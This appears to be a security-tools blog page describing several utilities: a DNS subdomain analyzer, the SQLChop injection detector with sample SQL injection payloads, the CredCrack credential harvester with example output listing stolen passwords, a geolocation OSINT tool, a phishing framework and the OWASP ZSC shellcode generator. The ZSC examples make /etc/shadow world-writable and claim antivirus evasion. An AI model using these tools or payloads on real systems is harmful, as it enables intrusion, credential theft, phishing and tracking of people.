SECURITY EDUCATION, PRIVACY GUIDANCE, THREAT AWARENESS, OPEN SOURCE TOOLS, RESEARCH NOTES, AND RESPONSIBLE TECHNOLOGY CONTENT

Tuesday, January 5, 2016

SubDomain Analyzer - Get detailed information of a domain




"SubDomain Analyzer" is a tool written in Python. Its purpose is to get full, detailed information about a selected domain. "SubDomain Analyzer" gathers data about the domain in the following steps:
  1. Trying to get the zone transfer file.
  2. Gathering all information from the DNS records.
  3. Analyzing the DNS records (analyzing all IP addresses found in the DNS records, testing the class C range of each address (for example 127.0.0.1/24) and keeping every host whose data contains the domain being analyzed).
  4. Testing subdomains by dictionary attack.

The Subdomain Analyzer can keep new addresses found in the DNS records or by the IP analyzer. The Subdomain Analyzer brings very qualitative information about the domain being analyzed and, in addition, shows a designed report with all the data.
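As an added illustration of step 3 (this is not code from the SubDomain Analyzer project), the following Python reproduces the IP-range analysis offline: it collects the addresses from the DNS records, widens each to its /24, reverse-resolves every host through an injected lookup function and keeps the names that belong to the analyzed domain. The records, the PTR table and every host name in them are constructed; pointed at your own ranges with a real resolver, the same logic shows which extra hosts your reverse DNS is advertising.

```python
import ipaddress

# Constructed sample DNS records (name, type, value) for the analyzed domain,
# i.e. a reduced version of what step 2 gathers.
SAMPLE_RECORDS = [
    ("example.com", "A", "198.51.100.10"),
    ("www.example.com", "A", "198.51.100.10"),
    ("example.com", "MX", "10 mx.example.com"),
    ("mx.example.com", "A", "198.51.100.25"),
    ("example.com", "NS", "ns1.example.com"),
    ("ns1.example.com", "A", "203.0.113.5"),
]

# Constructed reverse-DNS table standing in for live PTR lookups.
SAMPLE_PTR = {
    "198.51.100.10": "www.example.com",
    "198.51.100.25": "mx.example.com",
    "198.51.100.40": "staging.example.com",  # not in any forward record
    "198.51.100.77": "shop.example-cdn.net",  # same /24, different domain
    "203.0.113.5": "ns1.example.com",
    "203.0.113.9": "vpn.example.com",         # not in any forward record
}


def collect_ips(records):
    """Addresses named in A/AAAA records (step 2 output feeding step 3)."""
    return {ipaddress.ip_address(v) for _n, t, v in records if t in ("A", "AAAA")}


def class_c_ranges(ips):
    """The tool's 'class C range' test: each IPv4 address widened to its /24."""
    return {ipaddress.ip_network(f"{ip}/24", strict=False)
            for ip in ips if ip.version == 4}


def in_domain(name, domain):
    """True when a PTR name is the domain itself or a subdomain of it;
    a plain substring test would also match e.g. example.com.evil.net."""
    name = name.rstrip(".").lower()
    return name == domain or name.endswith("." + domain)


def analyze_ranges(records, domain, reverse_lookup):
    """Step 3: reverse-resolve every host of every /24 around the known
    addresses and keep the ones whose PTR name belongs to `domain`.
    Returns (all matches, matches not already present in the records)."""
    known = collect_ips(records)
    found = {}
    for net in sorted(class_c_ranges(known)):
        for host in net.hosts():
            name = reverse_lookup(str(host))
            if name and in_domain(name, domain):
                found[str(host)] = name
    new = {ip: n for ip, n in found.items() if ipaddress.ip_address(ip) not in known}
    return found, new


if __name__ == "__main__":
    found, new = analyze_ranges(SAMPLE_RECORDS, "example.com", SAMPLE_PTR.get)
    for ip, name in sorted(new.items()):
        print(f"reverse DNS exposes {name} at {ip} (not in forward records)")
```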

Examples:
  • Analyzing the example.com domain: subdomain-analyzer.py example.com
  • Analyzing the example.com domain, saving the records to a log file named log.txt, working with 100 threads and using another dictionary file named another-file.txt: subdomain-analyzer.py example.com --output log.txt --threads 100 --sub-domain-list another-file.txt
  • Analyzing the example.com domain, saving the records to a log file named log.txt and appending the new sub-domains to the sub-domains list file: subdomain-analyzer.py example.com -o log.txt --sub-domain-list

Requirements:

Linux Installation:
  1. sudo apt-get install python-dev python-pip
  2. sudo pip install -r requirements.txt
  3. easy_install prettytable

Mac OS X Installation:
  1. Install Xcode Command Line Tools (AppStore)
  2. sudo easy_install pip, prettytable
  3. sudo pip install -r requirements.txt

Windows Installation:
  1. Install dnspython
  2. Install gevent
  3. Install prettytable
  4. Open Command Prompt (cmd) as Administrator -> go to the Python folder -> Scripts (cd c:\Python27\Scripts)
  5. pip install -r (Full Path To requirements.txt)
  6. easy_install prettytable


SQLChop - SQL Injection Detection Engine




SQLChop is a novel SQL injection detection engine built on top of SQL tokenizing and syntax analysis. Web input (URL path, body, cookie, etc.) is first decoded to the raw payloads the web app accepts, then syntactical analysis is performed on each payload to classify the result. The algorithm behind SQLChop is based on compiler knowledge and automata theory, and runs at a time complexity of O(N).

Documentation

http://sqlchop.chaitin.com/doc.html

Dependencies

The SQLChop alpha testing release includes the C++ header and shared object, a Python library, and also some sample usages. The release has been tested on most Linux distributions.
If using Python, you need to install protobuf-python, e.g.:
$ sudo pip install protobuf
If using C++, you need to install protobuf, protobuf-compiler and protobuf-devel, e.g.:
$ sudo yum install protobuf protobuf-compiler protobuf-devel

Build

SQLChop Python API

The current alpha testing release is provided as a python library. C++ headers and examples will be released soon.
The following APIs are the main interfaces SQLChop exports.

is_sqli

Given a raw payload, determine whether the payload is an SQL injection payload.
  • Parameter: string
  • Return value: bool, return True for SQLi payload, return False for normal case.
>>> from sqlchop import SQLChop
>>> detector = SQLChop()
>>> detector.is_sqli('SELECT 1 From users')
True
>>> detector.is_sqli("' or '1'='1")
True
>>> detector.is_sqli('select the best student from classes as the student union representative')
False
>>> detector.is_sqli('''(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/''')
True

classify

Given a web application input, the classify API decodes the input and finds possible SQL injection payloads inside. If SQLi payloads are found, they are listed.
  • Parameter 1: object with following keys
    1. urlpath: string, the urlpath of web request
    2. body: string, the http body of POST/PUT request
    3. cookie: string, the cookie content of web request
    4. raw: string, other general field that needs general decoding.
  • Parameter 2: detail, if detail is True, detailed payload list will be returned, if False, only result will be returned, which runs faster.
  • Return: an object containing result and payloads
    1. result: int, a positive value indicates the web request contains an SQL injection payload
    2. payloads: list of objects containing key, score, value and source
      • key: string, reserved
      • source: string, shows where this payload is embedded in the original web request and how the payload was decoded
      • value: the decoded SQLi payload
      • score: the score of the decoded SQLi payload
Examples:
>>> from sqlchop import SQLChop
>>> detector = SQLChop()
>>> detector.classify({'urlpath': '/tag/sr/news.asp?d=LTElMjBhbmQlMjAxPTIlMjB1bmlvbiUyMHNlbGVjdCUyMDEsMiwzLGNocigxMDYpLDUsNiw3LDgsOSwxMCwxMSwxMiUyMGZyb20lMjBhZG1pbg==' }, True)
>>>
{
'payloads': [{
'key': '',
'score': 4.070000171661377,
'source': 'urlpath: querystring_decode b64decode url_decode ',
'value': '-1 and 1=2 union select 1,2,3,chr(106),5,6,7,8,9,10,11,12 from admin'
}],
'result': 1
}

>>> detector.classify({'body': 'opt=saveedit&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=42&arrs1[]=32&arrs1[]=70&arrs1[]=114&arrs1[]=111&arrs1[]=109&arrs1[]=32&arrs1[]=84&arrs1[]=97&arrs1[]=98&arrs1[]=108&arrs1[]=101&arrs1[]=32&arrs1[]=87&arrs1[]=72&arrs1[]=69&arrs1[]=82&arrs1[]=69&arrs1[]=32&arrs1[]=78&arrs1[]=97&arrs1[]=109&arrs1[]=101&arrs1[]=61&arrs1[]=39&arrs1[]=83&arrs1[]=81&arrs1[]=76&arrs1[]=32&arrs1[]=105&arrs1[]=110&arrs1[]=106&arrs1[]=101&arrs1[]=99&arrs1[]=116&arrs1[]=39&arrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=80&arrs1[]=97&arrs1[]=115&arrs1[]=115&arrs1[]=119&arrs1[]=111&arrs1[]=114&arrs1[]=100&arrs1[]=61&arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=97&arrs1[]=110&arrs1[]=100&arrs1[]=32&arrs1[]=67&arrs1[]=111&arrs1[]=114&arrs1[]=112&arrs1[]=61&arrs1[]=39&arrs1[]=39&arrs1[]=32&arrs1[]=111&arrs1[]=114&arrs1[]=32&arrs1[]=49&arrs1[]=61&arrs1[]=40&arrs1[]=83&arrs1[]=69&arrs1[]=76&arrs1[]=69&arrs1[]=67&arrs1[]=84&arrs1[]=32&arrs1[]=64&arrs1[]=64&arrs1[]=86&arrs1[]=69&arrs1[]=82&arrs1[]=83&arrs1[]=73&arrs1[]=79&arrs1[]=78&arrs1[]=41&arrs1[]=45&arrs1[]=45&arrs1[]=32&arrs1[]=39'}, True)
>>>
{
'payloads': [{
'key': '',
'score': 3.9800000190734863,
'source': 'body: querystring_decode ',
'value': "SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1=(SELECT @@VERSION)-- '"
}, {
'key': '',
'score': 2.0899999141693115,
'source': 'body: querystring_decode ',
'value': "'SQL inject' and Password"
}, {
'key': '',
'score': 2.180000066757202,
'source': 'body: querystring_decode ',
'value': "(SELECT @@VERSION)-- '"
}, {
'key': '',
'score': 0.0,
'source': 'body: querystring_decode ',
'value': 'saveedit'
}],
'result': 1
}
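The decoder chains in the source fields above (querystring_decode, b64decode, url_decode, and in the second example a numeric array that only becomes SQL once its elements are joined) are what lets classify find payloads hidden behind encodings. The following Python is an added example, not SQLChop's code: it peels those layers the same way and returns candidates in the same source/value shape. The first sample is the page's own urlpath request; the second body is a constructed, shortened version of the arrs1[] case; "chr_join" is this example's own label for the join step, and key holds the parameter name here where the page shows it reserved.

```python
import base64
import re
from urllib.parse import parse_qs, unquote, urlsplit

MAX_DEPTH = 4  # bound on how many stacked encodings are peeled from one value
B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")

# Page's own urlpath example (base64 of a URL-encoded payload in parameter d).
PAGE_URLPATH_REQUEST = {
    "urlpath": "/tag/sr/news.asp?d=LTElMjBhbmQlMjAxPTIlMjB1bmlvbiUyMHNlbGVjdCUyMDEsMiwzLGNocigxMDYpLDUsNiw3LDgsOSwxMCwxMSwxMiUyMGZyb20lMjBhZG1pbg==",
}
# Constructed, shortened version of the page's arrs1[] body: each array element
# is one character code, so the SQL only exists after the array is joined.
CONSTRUCTED_BODY_REQUEST = {
    "body": "opt=saveedit&arrs1[]=39&arrs1[]=32&arrs1[]=111&arrs1[]=114"
            "&arrs1[]=32&arrs1[]=49&arrs1[]=61&arrs1[]=49",
}


def _try_b64(value):
    """One base64 layer, accepted only if it yields printable ASCII.
    Heuristic: short alphanumeric values can decode by accident, which is
    why every candidate is kept and scored rather than replaced."""
    if len(value) % 4 or not B64_RE.match(value):
        return None
    try:
        out = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return out if out.isprintable() else None


def _try_url(value):
    """One percent-encoding layer ('+' was already handled by parse_qs)."""
    if "%" not in value:
        return None
    out = unquote(value)
    return out if out != value else None


DECODERS = (("b64decode", _try_b64), ("url_decode", _try_url))


def peel(value, source):
    """Apply decoders repeatedly, appending each layer's name to `source`
    in the same style as SQLChop's source string."""
    for _ in range(MAX_DEPTH):
        for name, fn in DECODERS:
            out = fn(value)
            if out is not None:
                value, source = out, source + name + " "
                break
        else:
            break  # no decoder changed the value: fully peeled
    return value, source


def chr_arrays(params):
    """Join repeated numeric array fields (arrs1[]=83&arrs1[]=69&...) into
    text. 'chr_join' is this example's own label for the step."""
    for key, values in params.items():
        if key.endswith("[]") and all(v.isdigit() and int(v) < 128 for v in values):
            yield key, "".join(chr(int(v)) for v in values)


def decode_request(request):
    """Return every candidate payload as {key, source, value}, mirroring the
    payload entries classify reports (scoring is left to the engine).
    Cookie decoding is omitted here for brevity."""
    candidates = []
    for field in ("urlpath", "body", "raw"):
        raw = request.get(field)
        if raw is None:
            continue
        if field == "raw":
            params, base = {"": [raw]}, "raw: "
        else:
            query = urlsplit(raw).query if field == "urlpath" else raw
            params = parse_qs(query, keep_blank_values=True)
            base = field + ": querystring_decode "
        for key, values in params.items():
            for v in values:
                value, source = peel(v, base)
                candidates.append({"key": key, "source": source, "value": value})
        for key, joined in chr_arrays(params):
            value, source = peel(joined, base + "chr_join ")
            candidates.append({"key": key, "source": source, "value": value})
    return candidates


if __name__ == "__main__":
    for req in (PAGE_URLPATH_REQUEST, CONSTRUCTED_BODY_REQUEST):
        for c in decode_request(req):
            print(repr(c["source"]), "->", repr(c["value"]))
```

Feeding the decoded values, not the raw request, into is_sqli is the point: scoring each candidate is the engine's job, and a false base64 layer on a harmless value simply becomes a low-scoring candidate like the 'saveedit' entry above.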

Customization

The is_sqli API (in sqlchop.py) detects SQLi using a score of 2.1 as the threshold; you can adjust this threshold according to your usage scenario.
    def is_sqli(self, payload):
        ret = self.score_sqli(payload)
        return ret > 2.1  # here you can modify and test this threshold

    def classify(self, request, detail=False):
        ...



CredCrack - Fast and Stealthy Credential Harvester



CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recursively in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded!

CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory.

Help
usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
                        line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples:

./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20

Examples

Enumerating Share Access
./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
---------------------------------------------------------------------
CredCrack v1.0 by Jonathan Broche (@g0jhonny)
---------------------------------------------------------------------

[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100

-----------------------------------------------------------------
192.168.1.102 - Windows 7 Professional 7601 Service Pack 1
-----------------------------------------------------------------

OPEN \\192.168.1.102\ADMIN$
OPEN \\192.168.1.102\C$

-----------------------------------------------------------------
192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2
-----------------------------------------------------------------

OPEN \\192.168.1.103\ADMIN$
OPEN \\192.168.1.103\C$
CLOSED \\192.168.1.103\F$

-----------------------------------------------------------------
192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1
-----------------------------------------------------------------

CLOSED \\192.168.1.100\ADMIN$
CLOSED \\192.168.1.100\C$
OPEN \\192.168.1.100\NETLOGON
OPEN \\192.168.1.100\SYSVOL

[*] Done! Completed in 0.8s

Harvesting credentials
./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:

---------------------------------------------------------------------
CredCrack v1.0 by Jonathan Broche (@g0jhonny)
---------------------------------------------------------------------

[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103

The loot has arrived...
__________
/\____;;___\
| / /
`. ())oo() .
|\(%()*^^()^\
%| |-%-------|
% \ | % )) |
% \|%________|


[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!

1 domain administrators found and highlighted in yellow above!

[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s



Geotweet - Social engineering tool for human hacking



Another way to use Twitter and Instagram. Geotweet is an OSINT application that allows you to track tweets and Instagram posts, trace their geographical locations and then export them to Google Maps. It allows you to search on tags, world zones and users (info and timeline).


Requirements
  • Python 2.7
  • PyQt4, tweepy, geopy, ca_certs_locater, python-instagram
  • Works on Linux, Windows, Mac OSX, BSD

Installation
git clone https://github.com/Pinperepette/Geotweet_GUI.git
cd Geotweet_GUI
chmod +x Geotweet.py
sudo apt-get install python-pip
sudo pip install tweepy
sudo pip install geopy
sudo pip install ca_certs_locater
sudo pip install python-instagram
python ./Geotweet.py



Katoolin - Automatically install all Kali Linux tools




Automatically install all Kali Linux tools

Features
  • Add Kali Linux repositories
  • Remove Kali Linux repositories
  • Install Kali Linux tools

Requirements
  • Python 2.7
  • An operating system (tested on Ubuntu)

Installation
sudo su
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py /usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin

Usage
  • Just select the number of a tool to install it
  • Press 0 to install all tools
  • back : Go back
  • gohome : Go to the main menu


Whonix v11 - Anonymous Operating System




Whonix is an operating system focused on anonymity, privacy and security. It’s based on the Tor anonymity network, Debian GNU/Linux and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user’s real IP.

Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible.


Whonix for Qubes

Whonix for KVM

Whonix for VirtualBox

If you want to upgrade an existing Whonix version using Whonix’s APT repository, special instructions are required:

Changelog between Whonix 10.0.0.5.5 and Whonix 11.0.0.2.3:

– fixed custom workstation build
– build script: refactoring, use errtrace rather than many traps – https://phabricator.whonix.org/T48
– build script: refactoring, use exit trap to reduce code duplication – https://phabricator.whonix.org/T269
– whonixcheck: warn if whonix-gateway / whonix-workstation package is not installed – https://phabricator.whonix.org/T264
– whonixcheck: warn if there is low entropy – https://phabricator.whonix.org/T202
– build, anon-apt-sources-list, anon-shared-build-apt-sources-tpo, whonix-repository: changed release codename from wheezy to jessie – https://phabricator.whonix.org/T270
– grub-enable-apparmor: Refactoring. Simplified for Debian jessie. Thanks to the new `/etc/default/grub.d` configuration folder, the `grub-enable-apparmor` has been greatly simplified. No longer need to config-package-dev divert `/etc/default/grub`.
– genmkfile: if debuild not available, recommend installation of the devscripts package
– build script: added fakeroot to whonix_build_script_build_dependency (required for verifiable builds)
– genmkfile: fix, do not set automatically make_use_gain_root_command to true if fakeroot is not installed
– genmkfile: run dpkg-checkbuilddeps before lintian to show better hint if build dependencies are missing
– build script: build-steps.d/1200_create-debian-packages: commented out get_extra_packages, no longer need to download packages from testing
– build script: refactoring, created separate help step, help-steps/git_sanity_test
– whonixcheck: verbose output for check_tor_socks_port_reachability
– all packages: packaging, bumped Standards-Version from 3.9.4 to 3.9.6 for jessie support
– lintian warning copyright fix
– tb-updater: show “highest version number is not necessarily the best one” message also on first run if no Tor Browser is installed yet – https://phabricator.whonix.org/T283
– build script: No longer install acpi-support-base by default on jessie, because systemd now implements that functionality. – https://phabricator.whonix.org/T284
– whonixcheck: added link to Whonix Build Version documentation https://www.whonix.org/wiki/Whonixcheck#Whonix_Build_Version – https://phabricator.whonix.org/T276
– build script: fix commit 287bdcf6ddee007ba579e3ee9a1997edc8188581 ‘makefile: added --pedantic to default DEBUILD_LINTIAN_OPTS because we are going to fix the last remaining “missing upstream changelog” warning’ – added --pedantic to help-steps/variables.
– all packages: added debian/source/lintian-overrides with debian-watch-may-check-gpg-signature to fix lintian warning – https://phabricator.whonix.org/T277
– whonix-setup-wizard, anon-gw-anonyminizer-config, whonixcheck, whonix-ws-start-menu-additions, whonix-host-firewall: added ‘Keywords=’ to ‘.desktop’ files to fix lintian warning ‘desktop-entry-lacks-keywords-entry’ – https://phabricator.whonix.org/T281
– anon-shared-helper scripts: replaced dependency ‘python-support (>= 0.90)’ with dh-python to fix lintian warning
– control-port-filter-python: packaging, use debhelper with python2 to fix lintian warning
– modify apt-get parameters during build to prevent need to remove apt-listchanges – https://phabricator.whonix.org/T282
– build-script: refactoring, moved variables DEBIAN_FRONTEND DEBIAN_PRIORITY DEBCONF_NOWARNINGS APT_LISTCHANGES_FRONTEND from help-steps/variables to buildconfig.d/30_apt_opts
– genmkfile: hint “Is the build dependency genmkfile installed?” if genmkfile is not installed
– genmkfile: hint ‘dpkg-parsechangelog not found. Do you have the “build-essential” package installed?’ if dpkg-parsechangelog is not available
– sdwdate: removed dependency on ruby1.9.1-dev to fix lintian warning ‘E: sdwdate: depends-on-obsolete-package depends: ruby1.9.1-dev’
– whonixcheck: show diagnostic message on whonixcheck Whonix News gpg verification failure by default
– build script: fix building Whonix on Whonix, fix if `lsb_release --short --i` returns ‘Whonix’. Temp hack ‘export whonix_build_on_operating_system="debian"’ no longer required. Thanks to @nrgaway for the bug report and the analysis. – https://phabricator.whonix.org/T278
– tb-updater: tbbversion_installed parser fix
– anon-meta-packages: removed dependency on libupower-glib1 which is no longer available in Debian jessie (which has been replaced by upower, that already gets installed)
– anon-base-files, whonix-developer-meta-files: implemented WHONIX_BUILD_QUBES=true environment variable support – https://phabricator.whonix.org/T298
– anon-meta-packages: whonix-gateway and whonix-workstation package no longer depend on anon-shared-build-fix-grub because it has been made a weak dependency for better physical isolation and Qubes support
– code simplification, removed support for environment variable ANON_BUILD_INSTALL_TO_ROOT=true because anon-shared-build-fix-grub now gets only installed on required platforms
– implemented build parameter ‘--unsafe-io true’, which speeds up builds: it uses ‘-o Dpkg::Options::=--force-unsafe-io’ and eatmydata, and ignores ‘sync’. – Thanks to @nrgaway for the suggestion! – https://phabricator.whonix.org/T295
– implemented $apt_misc_opts – https://phabricator.whonix.org/T295
– whonixcheck: new --verbose debug feature, showing output of systemd-detect-virt
– vbox-disable-timesync: more robust implementation that is compatible with systemd – https://phabricator.whonix.org/T106
– timesync: compatibility with systemd – https://phabricator.whonix.org/T106
– whonixcheck, msgdispatcher: ported to systemd – https://phabricator.whonix.org/T106
– qubes-whonix: skip rads on Qubes – https://phabricator.whonix.org/T306
– systemd unit files: workaround/fix, removed spaces from ‘WantedBy = ‘, likely bug in ‘deb-systemd-helper’ that prevents enabling the service by default – https://phabricator.whonix.org/T316
– created a hellodaemon package, useful for Debian systemd packaging debugging – not part of Whonix – https://github.com/adrelanos/hellodaemon
– whonixcheck: debian/control: fix, added to ‘Build-Depends:’ ‘ruby-ronn (>= 0.7.3)’
– disable torsocks warning spam – https://phabricator.whonix.org/T317
– whonix-libvirt: fixed CI builds
– whonix-libvirt: added driver name=’qemu’ – Thanks to HulaHoop! – https://github.com/Whonix/whonix-libvirt/pull/20 https://github.com/Whonix/whonix-libvirt/pull/19 https://github.com/Whonix/whonix-libvirt/pull/18
– anon-meta-packages: added obfs4proxy to anon-gateway-packages-recommended – https://phabricator.whonix.org/T323
– anon-meta-packages: added apt-transport-tor to anon-shared-packages-recommended – https://phabricator.whonix.org/T92
– whonix-gw-network-conf, whonix-ws-network-conf: removed ‘pre-up /usr/bin/whonix_firewall’ from /etc/network/interfaces, because the firewall packages now load the firewall from /etc/network/if-pre-up.d (see next entry) – https://phabricator.whonix.org/T68
– whonix-gw-firewall, whonix-ws-firewall, whonix-host-firewall: made the packages more standalone. Requiring ‘pre-up /usr/bin/whonix_firewall’ in /etc/network/interfaces is no longer necessary. Added etc/network/if-pre-up.d/30_whonix_firewall to load the firewall, because the Debian upstream bug ‘interface comes up even if a script in /etc/network/if-pre-up.d/ fails’ http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=700811 was fixed. – https://phabricator.whonix.org/T68
– whonixsetup, whonix-setup-wizard: fix ‘Tor fails after reload related to torrc DisableNetwork setting issue’ by only restarting Tor, no longer trying to reload Tor – https://phabricator.whonix.org/T320
– rads: improved implementation. When there is enough RAM… On ‘enter’: instantly start the login manager. On ‘ctrl + c’: instantly abort and do not start the login manager. On ‘timeout’: start the login manager. Thanks to ‘dh_systemd_start --no-start’ we can now use ‘StandardInput=tty’ and ‘read’ instead of ‘systemd-ask-password’. Now we could even implement an interactive menu at boot (that allows configuring the wait time and/or disabling rads). – https://phabricator.whonix.org/T57
– whonixcheck: abolished random wait by default – https://phabricator.whonix.org/T299
– anon-ws-disable-stacked-tor: fixed ‘insserv: script tor.anondist-orig: service tor already provided!’ warning during upgrades – https://phabricator.whonix.org/T303
– anon-ws-disable-stacked-tor: systemd compatibility – https://phabricator.whonix.org/T303
– anon-base-files: no longer ‘set -o pipefail’ in /usr/lib/pre.bsh. config-package-dev doesn’t like ‘set -o pipefail’ – http://mailman.mit.edu/pipermail/config-package-dev/2015-May/000041.html – https://phabricator.whonix.org/T329
– upstream bug report: spaces in Tor’s systemd unit file causes issues – https://trac.torproject.org/projects/tor/ticket/16162
– upstream bug report: Tor dies on reload when swichting to ‘DisableNetwork 0’ when using ‘DnsPort 127.0.0.1:53’ – https://trac.torproject.org/projects/tor/ticket/16161
– build script: fix, support ‘--verifiable false’ (was ‘--verifiable minimal’ while the build documentation said ‘false’)
– uwt: multi user fix – https://www.whonix.org/forum/index.php/topic,1267
– Qubes: WiFi Realtek RTL8191SEvB Issue and Solution – https://groups.google.com/forum/#!topic/qubes-users/kMGTSwP72aU
– whonix-setup-wizard API proposal: https://www.whonix.org/wiki/Dev/whonixsetup



SPF - SpeedPhish Framework




SPF (SpeedPhish Framework) is a python tool designed to allow for quick recon and deployment of simple social engineering phishing exercises.

Requirements:
  • dnspython
  • twisted
  • PhantomJS

Usage:
usage: spf.py [-h] [-f <list.txt>] [-C <config.txt>] [--all] [--test] [-e]
              [-g] [-s] [--simulate] [-w] [-W] [-d <domain>]
              [-c <company's name>] [--ip <IP address>] [-v] [-y]

optional arguments:
  -h, --help           show this help message and exit
  -d <domain>          domain name to phish
  -c <company's name>  name of company to phish
  --ip <IP address>    IP of webserver defaults to [192.168.1.124]
  -v, --verbosity      increase output verbosity

input files:
  -f <list.txt>        file containing list of email addresses
  -C <config.txt>      config file

enable flags:
  --all                enable ALL flags... same as (-e -g -s -w)
  --test               enable all flags EXCEPT sending of emails... same as
                       (-e -g --simulate -w -y -v -v)
  -e                   enable external tool utilization
  -g                   enable automated gathering of email targets
  -s                   enable automated sending of phishing emails to targets
  --simulate           simulate the sending of phishing emails to targets
  -w                   enable generation of phishing web sites
  -W                   leave web server running after termination of spf.py

misc:
  -y                   automatically answer yes to all questions

Execution:
cd spf
python spf.py --test -d example.com

or to just test the websites:
cd spf
python web.py default.cfg

Misc

Video of sample usage

BsidesKnox 2015 video



OWASP ZSC Shellcoder - Generate Customized Shellcodes





OWASP ZSC is open source software in the Python language which lets you generate customized shellcodes for the listed operating systems. This software can be run on Windows, Linux/Unix, OS X and other OSes under Python 2.7.x.


Description

Usage of shellcodes

Shellcodes are small pieces of assembly code which can be used as the payload in software exploitation. Other uses are in malware, bypassing antiviruses, obfuscated code, etc.

Why use OWASP ZSC ?

Compared with other shellcode generators such as the Metasploit tools, OWASP ZSC uses new encodings and methods which antiviruses won't detect. The OWASP ZSC encoders are able to generate shellcodes with random encodings, which lets you get thousands of new dynamic shellcodes doing the same job in just a second; that means you will not get the same code twice if you use random encodes with the same commands, and that makes OWASP ZSC one of the best. It is also going to generate shellcodes for many operating systems in the next versions.

Help Menu
Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-wizard => wizard mod

-update => check for update
-about => about software and developers.
With these switches you can see the OS list, the encode types and the functions [joblist] to generate your shellcode.
OS List "-oslist"
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64

Encode Types "-types"
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all

Functions "-joblist"
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')


Now you are able to choose your operating system, function and encode to generate your shellcode, but not all of these features are activated yet, so you have to look up this table HERE to see which features are activated.


For example, this part of the table tells us that all functions for linux_x86 are activated, but the encodes [xor_random, xor_yourvalue, add_random, add_yourvalue, sub_random, sub_yourvalue, inc, inc_timesyouwant, dec, dec_timesyouwant] are only activated for the chmod() function.

Examples
>zsc -os linux_x86 -encode inc -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode inc_10 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec_30 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode xor_0x41414141 -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_0x45872f4d -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_0x41414141 -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_random -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_0x41414141 -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello.txt','hello')" -o file.txt
